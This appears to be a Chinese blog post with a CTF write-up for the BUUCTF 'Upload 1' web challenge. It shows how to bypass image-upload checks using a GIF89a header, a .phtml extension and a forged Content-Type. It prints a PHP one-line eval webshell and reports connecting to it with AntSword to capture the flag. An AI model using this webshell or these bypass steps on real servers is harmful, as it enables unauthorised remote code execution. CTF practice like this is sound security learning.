视频分享地址: https://space|

明月照江江

园龄:7年4个月粉丝:33关注:0

📂CTF
🔖CTF
2022-12-11 21:07阅读: 399评论: 0推荐: 0

[BUUCTF][WEB][极客大挑战 2019]Upload 1

打开靶机url,看到一个页面可以上传文件
上传一个图片试一下,发现上传的路径是
http://a7661b03-4852-41de-9ea4-d48c47cb50f0.node4.buuoj.cn:81/upload_file.php
试一下获取文件列表路径
http://a7661b03-4852-41de-9ea4-d48c47cb50f0.node4.buuoj.cn:81/upload
发现可以看见上传的文件列表,那么就可以通过这个路径去访问我们上传的php文件了,现在就缺如何把自己的文件传上去了,这里没有修改文件后缀名称的办法,所以必须上传apache认识的php的后缀,比如:

php php7 phtml

再就是绕过后端的图片文件检查,构造一句话木马
GIF89a
<script language="php">eval($_POST['a'])</script>
文件后缀尝试,最后发现phtml可以上传成功,文件命名为shell.phtml
上传,提示 no image,请求头 Content-Type 值改为 image/jpg

显示

上传文件名: shell.phtml<br></strong>
再用获取文件列表的url看看文件是否在里面,果然在
通过蚁剑链接木马,成功在根目录获取到flag

本文作者:明月照江江的技术博客

本文链接:https://www.cnblogs.com/gradyblog/p/16974478.html

版权声明:本作品采用知识共享署名-非商业性使用-禁止演绎 2.5 中国大陆许可协议进行许可。

posted @   明月照江江  阅读(399)  评论(0编辑  收藏  举报
点击右上角即可分享
微信分享提示
评论
收藏
关注
推荐
深色
回顶
收起